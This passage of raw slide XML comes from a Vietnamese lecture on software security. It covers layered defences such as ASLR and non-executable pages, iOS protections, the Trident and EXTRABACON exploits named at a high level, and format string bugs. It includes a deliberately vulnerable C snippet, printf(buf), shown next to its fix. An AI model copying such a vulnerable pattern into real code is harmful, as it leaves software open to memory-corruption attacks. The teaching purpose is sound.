            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200"/>
              <a:t>Kết hợp các kỹ thuật phòng chống</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AE802FB-B704-82CF-5AD9-828309BA9460}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Tại sao?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Các kỹ thuật có thể cộng hưởng để tăng hiệu quả lẫn nhau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Buộc kẻ tấn công phải tìm ra nhiều lỗ hổng để khai thác thành công</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Bảo vệ theo chiều sâu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ví dụ: kết hợp ASLR và non-executable pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Không thể sử dụng mã thực thi có sẵn trong bộ nhớ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Không thể sử dụng shellcode ghi vào stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Để vượt qua đồng thời hai kỹ thuật phòng chống:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicParenBoth"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Cần tìm cách để phát lộ địa chỉ của vùng nhớ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicParenBoth"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Tìm cách để ghi chuỗi địa chỉ trả về ROP vào bộ nhớ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29297599-FEF6-AAAB-1DC0-A52F9C49AD2A}"/>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40275257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9339-77DC-3F76-AE46-0A5AE57325A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Kết hợp phòng chống: Apple iOS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB430950-7472-9228-2A64-ECA799C8507C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Các kỹ thuật bảo vệ bộ nhớ trên Apple iOS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ASLR sử dụng cho ứng dụng và nhân hệ điều hành</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Non-executable pages được sử dụng bất kỳ vị trí nào có thể</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Mỗi ứng dụng được thực thi trong một vùng sandbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Kỹ thuật khai thác “đinh ba”(trident exploit)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Được phát triển bởi công ty NSO (Isreal)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Khai thác lỗ hổng của trình duyệt Safari để thực thi mã độc trong sandbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Khai thác lỗ hổng khác để đọc được vùng nhớ stack của nhân hệ điều hành</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Khai thác lỗ hổng trong hệ điều hành để thực thi mã độc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{884DA11F-1317-981E-12A3-0DA34447EBA9}"/>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33734707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86B1-9C32-834C-DA6C-1E499468D016}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Kích hoạt phòng chống</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE60256A-C045-7B90-1121-5503419EE558}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Phần lớn kỹ thuật phòng chống rất hiệu quả và không ảnh hưởng đáng kể tới hiệu năng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Các kỹ thuật có thể mặc định được kích hoạt hoặc không</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Khi các kỹ thuật không được kích hoạt mặc định thì mặc định này thường được sử dụng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> kẻ tấn công dễ dàng khai thác hơn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ví dụ: Cisco ASA bị khai thác bởi công cụ EXTRABACON của NSA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA81D1A0-F5DB-52F3-707A-5E79525D4502}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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4312323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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3600"/>
              <a:t>3. Một số lỗ hổng phần mềm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600"/>
              <a:t> khác</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4000"/>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6" name="Subtitle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AD14131-FC53-3456-DA71-ED3B55C4B8A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05533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BF45-7705-495E-9D2F-609292451FD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lỗ hổng xâu định dạng</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DA00090-5C53-4252-9C9B-E8FB9DC760C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1092993"/>
            <a:ext cx="8229600" cy="2183607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Format String: Xâu định dạng vào ra dữ liệu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lỗ hổng Format String: xâu định dạng không phù hợp với danh sách tham số</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ví dụ</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CACCBDB-196A-48A8-B9F1-D95B17B893D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8305800" y="6362699"/>
            <a:ext cx="533400" cy="329184"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8A73401-946E-4E9B-9F18-E424335F15C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="2807374"/>
            <a:ext cx="6328229" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void func()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   char buf[32];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   if(fgets(buf, sizeof(buf),stdin) == NULL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	  return;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   printf(buf); //Sửa: printf(“%s”, buf);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN">
              <a:solidFill>
                <a:srgbClr val="000000"/>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D4E9170B-8EEA-473D-B34A-460E5ADADB9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6616863" y="5105400"/>
            <a:ext cx="2265199" cy="65960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rgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCB19F54-6201-4339-A17B-BBB7342D1213}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="5105400"/>
            <a:ext cx="5410200" cy="659607"/>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9078156D-6DBC-482A-AE33-A18EF4E771E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="261936" y="5207000"/>
            <a:ext cx="8729663" cy="502558"/>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9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02816FF5-96E9-4D77-ABA1-E3F312C1992C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5634819" y="5252243"/>
            <a:ext cx="838198" cy="4279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rPr>
              <a:t>&amp;fmt</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B652DB4-D582-422D-8750-9026E03867E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3867125" y="5245893"/>
            <a:ext cx="838199" cy="4279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%ebp</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC2183FF-58FF-43D6-AF6C-A89A0A1E9C16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4748187" y="5252243"/>
            <a:ext cx="838199" cy="4279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%eip</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC82FACC-9881-4578-B55C-71AAAD2BD9BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="5857646"/>
            <a:ext cx="3147986"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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’s stack frame</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CA0F5E8-E46B-4B81-832E-53CF8DF29FFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6748462" y="5775552"/>
            <a:ext cx="1938338" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Caller’s stack frame</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E020E3DC-AE78-48F6-AA7A-CA2019D4E289}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="2343090"/>
            <a:ext cx="4114800" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>printf(char * fmt, [value list])</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E13BB6D8-2D6C-47D0-B2BF-0C2B3C2CEB02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5346201" y="6417106"/>
            <a:ext cx="703326" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“%d”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10A55011-E100-4D29-9241-DC1BAF92EC38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5738786" y="5562600"/>
            <a:ext cx="315132" cy="7840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28655C91-6871-40AD-B114-5CCFCAF554A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="1"/>
            <a:endCxn id="21" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4114800" y="6601772"/>
            <a:ext cx="1231401" cy="6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1E599B3-056C-4B09-B9E0-541E3DCD9E97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2614160" y="6482833"/>
            <a:ext cx="1500640" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf(“%d”);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9560CC50-5A37-400A-9129-7A9E302A84FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593672" y="5257800"/>
            <a:ext cx="1437920" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[value list]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
